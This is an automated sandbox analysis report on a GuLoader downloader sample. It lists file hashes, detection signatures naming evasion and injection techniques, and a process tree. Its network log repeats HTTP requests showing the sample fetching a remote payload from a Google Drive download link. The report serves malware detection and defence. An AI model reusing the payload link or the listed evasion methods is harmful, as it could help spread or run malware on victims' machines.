Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fTSt7dc60O.exe

Overview

General Information

Sample name:fTSt7dc60O.exe
renamed because original name is a hash value
Original sample name:2eaf30511cb438075facb1d59f944a6ddedf3aa5c2620e0916a150f5415983bb.exe
Analysis ID:1587610
MD5:0eecc852b848039da55141fb43dd01e2
SHA1:9f1f57db9890e515dd132bc7d1157ef1a2ff0cad
SHA256:2eaf30511cb438075facb1d59f944a6ddedf3aa5c2620e0916a150f5415983bb
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • fTSt7dc60O.exe (PID: 2608 cmdline: "C:\Users\user\Desktop\fTSt7dc60O.exe" MD5: 0EECC852B848039DA55141FB43DD01E2)
    • fTSt7dc60O.exe (PID: 4640 cmdline: "C:\Users\user\Desktop\fTSt7dc60O.exe" MD5: 0EECC852B848039DA55141FB43DD01E2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1367001967.00000000055DB000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000008.00000002.2484621112.000000000219B000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T15:39:04.044797+010028032702Potentially Bad Traffic192.168.2.751990172.217.18.14443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: fTSt7dc60O.exeVirustotal: Detection: 77%Perma Link
      Source: fTSt7dc60O.exeReversingLabs: Detection: 66%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: fTSt7dc60O.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:51990 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:51996 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52036 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52053 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:52062 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52087 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52104 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52119 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52138 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52172 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52186 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:52192 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52203 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52212 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52214 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52217 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52223 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52225 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52227 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52229 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52231 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52235 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52239 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52241 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52243 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52245 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52249 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:52250 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52253 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52255 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52263 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52267 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:52271 version: TLS 1.2
      Source: fTSt7dc60O.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004057D0
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 8_2_00402770 FindFirstFileW,8_2_00402770
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 8_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_004057D0
      Source: C:\Users\user\Desktop\fTSt7dc60O.exeCode function: 8_2_0040628B FindFirstFileW,FindClose,8_2_0040628B
      Source: global trafficTCP traffic: 192.168.2.7:51984 -> 1.1.1.1:53
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51990 -> 172.217.18.14:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
